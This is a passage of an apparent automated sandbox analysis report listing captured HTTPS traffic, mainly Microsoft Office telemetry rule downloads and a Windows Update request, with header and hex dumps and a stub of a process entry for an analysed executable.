                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        141192.168.2.74993713.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:18 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:19 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:19 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1388
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                        ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                        x-ms-request-id: ab1afa94-201e-0085-151a-3d34e3000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041219Z-178bfbc474bv7whqhC1NYC1fg400000005dg00000000b6k7
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:19 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        142192.168.2.74994213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:18 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:19 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1405
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                        ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                        x-ms-request-id: 6d8f64b9-901e-005b-763b-3c2005000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041219Z-178bfbc474bgvl54hC1NYCsfuw00000005e0000000007g65
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:19 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        143192.168.2.74994113.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:18 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:19 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1368
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                        ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                        x-ms-request-id: cd486f0a-401e-0048-5b49-3c0409000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041219Z-178bfbc474b9fdhphC1NYCac0n00000005e00000000048sa
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:19 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        144192.168.2.7499434.175.87.197443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:20 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=x+GKtrEwdR9nSl4&MD=2zgGtu86 HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                        2024-11-24 04:12:20 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        Expires: -1
                                                                                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                        ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                        MS-CorrelationId: 1686ea57-c9dc-49d2-8d06-496341f89fc5
                                                                                                                                                                        MS-RequestId: 559f307a-1f38-4232-8cd3-d2cba9502734
                                                                                                                                                                        MS-CV: 7vfYAKj+KU2KRCQO.0
                                                                                                                                                                        X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:19 GMT
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Content-Length: 30005
                                                                                                                                                                        2024-11-24 04:12:20 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                        Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                        2024-11-24 04:12:20 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                        Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        145192.168.2.74995013.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:20 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:21 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1415
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                        ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                        x-ms-request-id: 9616670f-801e-008c-16a7-3b7130000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041221Z-15b8b599d88cn5thhC1TEBqxkn00000003wg0000000027n9
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:21 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        146192.168.2.74995213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:21 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:21 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1378
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                        ETag: "0x8DC582BE584C214"
                                                                                                                                                                        x-ms-request-id: 36815d12-601e-0070-4763-3ba0c9000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041221Z-178bfbc474bh5zbqhC1NYCkdug00000005ag00000000cbma
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:21 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        147192.168.2.74995313.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:21 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:21 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1407
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                        ETag: "0x8DC582BE687B46A"
                                                                                                                                                                        x-ms-request-id: 4e85307b-101e-007a-398c-3a047e000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041221Z-174c587ffdfx984chC1TEB676g000000040g0000000012q5
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:21 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        148192.168.2.74995413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:21 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:21 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1370
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                        ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                        x-ms-request-id: a4032f19-b01e-0084-598d-3bd736000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041221Z-174c587ffdfmlsmvhC1TEBvyks000000041g00000000drzb
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:21 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        149192.168.2.74995513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:21 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:21 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                        ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                        x-ms-request-id: e5390902-901e-0015-1805-3db284000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041221Z-178bfbc474bbcwv4hC1NYCypys000000058g00000000amy5
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:21 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:23:11:14
                                                                                                                                                                        Start date:23/11/2024
                                                                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        Wow64 process (32bit):true
